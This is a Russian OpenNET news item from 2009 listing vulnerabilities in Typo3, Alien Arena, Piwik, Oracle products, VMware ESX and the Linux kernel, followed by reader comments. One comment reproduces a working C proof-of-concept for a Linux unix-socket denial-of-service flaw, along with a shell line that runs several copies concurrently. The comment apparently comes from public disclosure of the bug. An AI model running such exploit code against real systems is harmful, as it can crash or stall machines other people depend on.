The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

Уязвимости в Typo3, Alien Arena, Piwik, Oracle, VMware и Linux ядре

24.10.2009 22:12

Серия новых уязвимостей:

  • В системе управления web-контентом Typo3 найдено 7 уязвимостей, среди которых имеется серьезная проблема - возможность осуществить подстановку SQL кода аутентифицированным пользователем. Остальные проблемы связаны с совершением XSS атак (межсайтовый скриптинг), обходом механизмов контроля доступа и возможностью выполнить shell-скрипты на сервере, при наличии редакторского уровня доступа и установке стороннего upload-расширений. С исправлением проблем в экстренном порядке выпущены версии 4.1.13, 4.2.10 и 4.3beta2.
  • В открытой игре Alien Arena найдена критическая уязвимость, позволяющая злоумышленнику выполнить свой код на игровом сервере, отправив специально модифицированный UDP-пакет на сетевой порт 27901. Проблема исправлена в выпуске 7.31;
  • В продуктах Oracle найдено 14 новых уязвимостей, среди которых присутствуют ошибки, позволяющие выполнить код злоумышленника или получить доступ на изменение или чтение закрытых данных;
  • В свободном пакете для web-аналитики Piwik (позиционируется как свободная альтернатива сервису Google Analytics) зафиксирована критическая уязвимость, позволяющая любому имеющему доступ к статистике посетителю выполнить свой код на сервере, через загрузку через web-форму файла с расширением php и его последующего запроса. Проблема устранена в выпуске Piwik 0.44;
  • В VMware ESX Server устранено несколько опасных уязвимостей, позволяющих локальному пользователю вызвать отказ в обслуживании, повысить свои привилегии в системе, обойти ограничения безопасности и получить доступ к закрытым данным;
  • Три уязвимости зафиксированы в коде Linux ядра:
    • Вызов отказа в обслуживании через выполнения через функцию unix_stream_connect() некорректных операций с сокетами;
    • Возможность доступа к участку памяти ядра из-за ненадлежащей очистки структуры "tcm__pad2", используемой в функции "tcf_fill_node()";
    • Вызов краха ядра и потенциальная возможность повышения привилегий в системе из-за ошибки в функции "get_instantiation_keyring()". Из за трудности эксплуатации уязвимостям присвоен незначительный уровень опасности.


  1. Главная ссылка к новости (http://www.oracle.com/technolo...)
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/23973-typo3
Ключевые слова: typo3, security, oracle, vmware
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (8) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, NicK (?), 22:47, 24/10/2009 [ответить]  
  • +/
    А что сервер Alien Arena выполняется с правами root?
     
     
  • 2.3, anonymouse (?), 23:27, 24/10/2009 [^] [^^] [^^^] [ответить]  
  • +/
    > А что сервер Alien Arena выполняется с правами root?

    А что левый код у вас может выполнятся под учётной записью?

     
  • 2.5, XoRe (ok), 00:49, 25/10/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >А что сервер Alien Arena выполняется с правами root?

    Думаю, как настроят, так и выполняется.
    А настраивают по разному...)

     
     
  • 3.7, Zenitur (?), 03:11, 26/10/2009 [^] [^^] [^^^] [ответить]  
  • +/
    Если человек создаст сервер на FreeBSD или Linux, который будет круглосуточно заниматься только Alien Arena, то да - вполне возможно, что сервер запустится от root.
     

  • 1.2, User294 (ok), 23:08, 24/10/2009 [ответить]  
  • +/
    > В системе управления web-контентом Typo3 найдено 7 уязвимостей,

    А кто-то мне говорил что он безопасный... но как видим нет в мире совершенства.

     
     
  • 2.4, ононим (?), 23:30, 24/10/2009 [^] [^^] [^^^] [ответить]  
  • +/
    Кнут считает по другому.
     
  • 2.8, Moosh (?), 15:56, 26/10/2009 [^] [^^] [^^^] [ответить]  
  • +/
    Тупо3 и безопасный? Оксюморон!
    Вместо чем верить кому-то, стоило просто посмотреть security advisory.
     

  • 1.6, pavlinux (ok), 19:35, 25/10/2009 [ответить]  
  • +/
    > Из за трудности эксплуатации уязвимостям присвоен незначительный уровень опасности.

    ------------
    int main(void) {

    int ret, csd, lsd;
    struct sockaddr_un sun;

    /* make an abstruct name address (*) */
    memset(&sun, 0, sizeof(sun));
    sun.sun_family = PF_UNIX;
    sprintf(&sun.sun_path[1], "%d", getpid());

    /* create the listening socket and shutdown */
    lsd = socket(AF_UNIX, SOCK_STREAM, 0);
    bind(lsd, (struct sockaddr *)&sun, sizeof(sun));
    listen(lsd, 1);
    shutdown(lsd, SHUT_RDWR);

    /* connect loop */
    alarm(15); /* forcely exit the loop after 15 sec */
    for (;;) {
    csd = socket(AF_UNIX, SOCK_STREAM, 0);
    ret = connect(csd, (struct sockaddr *)&sun, sizeof(sun));
    if (-1 == ret) {
    perror("connect()");
    break;
    }
    puts("Connection OK");
       }
    return 0;
    }
    -----

    You should run the ./unix-socket-dos-exploit concurrently, like below:
    for i in {1..4} ; do ./unix-socket-dos-exploit & done
    # For safety reason, the PoC code stops in 15 seconds by alarm(15).


    http://patchwork.kernel.org/patch/54678/

     
     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2024 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру